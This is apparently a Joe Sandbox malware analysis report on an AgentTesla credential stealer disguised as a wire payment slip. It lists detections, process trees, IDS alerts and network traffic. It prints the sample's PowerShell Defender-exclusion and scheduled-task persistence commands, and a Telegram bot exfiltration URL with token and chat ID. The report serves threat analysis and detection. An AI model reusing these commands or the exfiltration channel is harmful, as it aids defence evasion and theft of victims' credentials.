Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Wire slip account payable.pif.exe

Overview

General Information

Sample name:Wire slip account payable.pif.exe
Analysis ID:1560051
MD5:f3c67cd1bbb9c8a8bcb56ee97c5a7b27
SHA1:ad3397267ada55bca8d547dbb93bc79f40d138cf
SHA256:a36c66fb7fdfb2639cc0ccdeaeef4e6c1a1cd103ba76309ed32777b3f2ab069d
Tags:AgentTeslaexePaymentpifuser-cocaman
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Wire slip account payable.pif.exe (PID: 1596 cmdline: "C:\Users\user\Desktop\Wire slip account payable.pif.exe" MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)
    • powershell.exe (PID: 7172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7660 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7244 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • EQVRGq.exe (PID: 7560 cmdline: C:\Users\user\AppData\Roaming\EQVRGq.exe MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)
    • schtasks.exe (PID: 7788 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • EQVRGq.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Roaming\EQVRGq.exe" MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)
    • EQVRGq.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Roaming\EQVRGq.exe" MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage?chat_id=5968311109"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 22 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Wire slip account payable.pif.exe.3e03808.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Wire slip account payable.pif.exe.3e03808.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Wire slip account payable.pif.exe.3e03808.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.Wire slip account payable.pif.exe.3e03808.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x34538:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x345aa:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x34634:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x346c6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x34730:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x347a2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x34838:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x348c8:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 13 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ProcessId: 7172, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ProcessId: 7172, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EQVRGq.exe, ParentImage: C:\Users\user\AppData\Roaming\EQVRGq.exe, ParentProcessId: 7560, ParentProcessName: EQVRGq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp", ProcessId: 7788, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", ProcessId: 7244, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ProcessId: 7172, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", ProcessId: 7244, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-21T11:02:11.422015+010028517791Malware Command and Control Activity Detected192.168.2.449737149.154.167.220443TCP
                      2024-11-21T11:02:14.684700+010028517791Malware Command and Control Activity Detected192.168.2.449741149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-21T11:02:11.422015+010028528151Malware Command and Control Activity Detected192.168.2.449737149.154.167.220443TCP
                      2024-11-21T11:02:13.971032+010028528151Malware Command and Control Activity Detected192.168.2.449740149.154.167.220443TCP
                      2024-11-21T11:02:14.684700+010028528151Malware Command and Control Activity Detected192.168.2.449741149.154.167.220443TCP
                      2024-11-21T11:02:17.101071+010028528151Malware Command and Control Activity Detected192.168.2.449742149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-21T11:02:11.743222+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449737TCP
                      2024-11-21T11:02:14.259420+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449740TCP
                      2024-11-21T11:02:14.976060+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449741TCP
                      2024-11-21T11:02:17.435516+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449742TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage?chat_id=5968311109"}
                      Source: EQVRGq.exe.7856.14.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage"}
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeReversingLabs: Detection: 63%
                      Source: Wire slip account payable.pif.exeReversingLabs: Detection: 63%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeJoe Sandbox ML: detected
                      Source: Wire slip account payable.pif.exeJoe Sandbox ML: detected
                      Source: Wire slip account payable.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: Wire slip account payable.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 4x nop then jmp 0749B331h0_2_0749B479
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 4x nop then jmp 06C1A5C9h9_2_06C1A711

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49741 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49741 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49737 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49737 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49741
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49740 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49740
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49742 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49737
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49742
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a634aff9Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0a0b1ada11a6Host: api.telegram.orgContent-Length: 3951Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a859de79Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0a042708acedHost: api.telegram.orgContent-Length: 3951Expect: 100-continue
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a634aff9Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                      Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1739600975.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 00000009.00000002.1783883607.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1742697410.0000000005750000.00000004.00000020.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
